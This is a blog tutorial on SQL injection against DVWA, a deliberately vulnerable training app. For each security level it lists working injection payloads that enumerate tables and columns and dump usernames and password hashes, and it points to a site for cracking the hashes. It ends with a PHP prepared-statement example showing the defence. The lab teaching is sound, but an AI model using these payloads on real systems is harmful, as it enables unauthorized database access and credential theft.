Kali penetration testing of DVWA, Part 7: SQL Injection

Table of Contents

I. SQL injection

1. SQL injection vulnerability principle

2. SQL injection types

3. SQL injection procedure

II. Experimental environment

III. Experimental procedure

Security level: Low

Security level: Medium

Security level: High

Security level: Impossible


I. SQL injection

1. SQL injection vulnerability principle

SQL injection inserts SQL commands into a web form submission, or into the query string of a domain name or page request, so that the server is tricked into executing malicious SQL commands.

2. SQL injection types

  • Character type
  • Numeric type
  • Search type

3. SQL injection procedure

  1. Determine whether an injection point exists, and whether it is numeric or character type;
  2. Guess the number of fields in the SQL query statement;
  3. Determine the display positions;
  4. Get the current database;
  5. Get the tables in the database;
  6. Get the field names in the table;
  7. Download the data.

II. Experimental environment

1. Test machine: a physical Windows 10 machine that logs in to DVWA remotely, with Burp Suite installed.

2. DVWA server: Windows Server 2003 (192.168.247.129), with phpStudy started.

III. Experimental procedure

Security level: Low

View source

As can be seen from the source, the Low level performs no checking or filtering at all on the contents of the id parameter, so an obvious SQL injection exists, and it is a character-type injection.

Usage scenarios

1. Determine whether injection exists, and whether it is character or numeric type

Enter 1: the query succeeds.

Enter 1' and '1'='1 or 1' or '1234'='1234: results are returned successfully, which shows that SQL injection exists and that it is character type.

2. Guess the number of fields in the SQL query statement

Entering 1' order by 1 # and 1' order by 2 # in the input box both return normally. Compared against the source, this query sorts the user_id data in the users table by the first (second) field.

Entering 1' order by 3 # in the input box returns an error (Unknown column '3' in 'order clause'), which shows that the query has 2 fields, i.e. two columns of data are returned.

3. Determine the display positions of the fields

Once the number of fields is known, use union select queries to continue obtaining data.

1' union select 1,2 #        // 1 is displayed in the First name position, 2 in the Surname position

4. Get the current database name

1' union select version(),database() #         // position 1 shows the database version, position 2 shows the database name

5. Get the tables in the database

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #        // position 2 shows the tables in the database

6. Get the field names in the specified table

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #       // position 2 shows the field names in the users table

7. Get the data

1' union select user,password from users #      // position 1 shows the username, position 2 shows the encrypted password

Use SOMD5 to recover the plaintext passwords from the hashes.

Security level: Medium

View source

Looking at the source, the mysql_real_escape_string function escapes the special characters \x00, \n, \r, \x1a, ' and "; a numeric SQL injection exists. A drop-down select form is also used to control user input, and as the figure below shows, the user can only choose the numbers 1-5.

Usage scenarios

1. Determine whether injection exists, and whether it is character or numeric type

Use Burp Suite to modify the captured request (POST method) to carry out the SQL injection.

1 and 1=1   or   1 or 1234 = 1234      // both return results successfully, so SQL injection exists and it is numeric type

2. Guess the number of fields in the SQL query statement

1 order by 2

After trying, the number of fields is determined to be 2.

3. Determine the display positions

1 union select 1,2        // 1 is displayed in the First name position, 2 in the Surname position

4. Get the current database name

1 union select 1,database()        // position 2 shows the database name dvwa

5. Get the tables in the database

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

6. Get the field names in the specified table

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

Because table_name='users' contains single quotes, which would be escaped, 'users' has to be encoded (here in hexadecimal) before the query is sent.

7. Get the data

1 union select user,password from users    // get the usernames and the encrypted passwords

The plaintext passwords can be obtained with a decryption tool (https://www.somd5.com/).

Security level: High

View source

The High level adds LIMIT 1 to the SQL query statement, so that each input returns only one result; we can comment it out with #. The remaining operations are the same as at the Low security level.

1' or '1234'='1234 #

1' order by 1 #

1' union select 1,2 #

1' union select 1,database() #

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

1' union select user,password from users #

Security level: Impossible

View source

The Impossible level uses PDO, which draws a clear line between code and data and so defends effectively against SQL injection; in addition, output is produced only when the query returns exactly 1 row.
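To make the contrast concrete, here is an added example (not DVWA's own source) that puts the Low-level string concatenation beside the kind of PDO prepared statement the Impossible level relies on: the concatenated query returns every row for the character-type payload, while the prepared version rejects it and shows a single row only for a plain numeric id. It assumes PHP with the pdo_sqlite extension, an in-memory SQLite table standing in for the MySQL users table, and constructed sample rows; because SQLite does not understand MySQL's # comment, the comment-free payload from the Low section is used.

```php
<?php
// Added example, not DVWA's own source. An in-memory SQLite database
// (pdo_sqlite) stands in for DVWA's MySQL users table; the three rows
// are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'Gordon', 'Brown'), (3, 'Pablo', 'Picasso')");

// Low level: the id is concatenated into the SQL text, so a quote in the
// input ends the string literal and the rest of the input is parsed as SQL.
function lowLevelLookup(PDO $db, string $id): array
{
    $sql = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Impossible level: reject non-numeric ids, bind the id as a parameter so it
// travels separately from the SQL text, and show output only when exactly
// one row comes back.
function impossibleLevelLookup(PDO $db, string $id): ?array
{
    if (!is_numeric($id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    return count($rows) === 1 ? $rows[0] : null;
}

// The character-type test input from the Low section; it needs no trailing
// comment, so SQLite parses it the same way MySQL would.
$payload = "1' or '1234'='1234";

printf("Low level, payload:        %d row(s) returned\n", count(lowLevelLookup($db, $payload)));
printf("Impossible level, payload: %s\n", var_export(impossibleLevelLookup($db, $payload), true));
printf("Impossible level, id 2:    %s\n", var_export(impossibleLevelLookup($db, '2'), true));
```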


Source: blog.csdn.net/weixin_43625577/article/details/90110633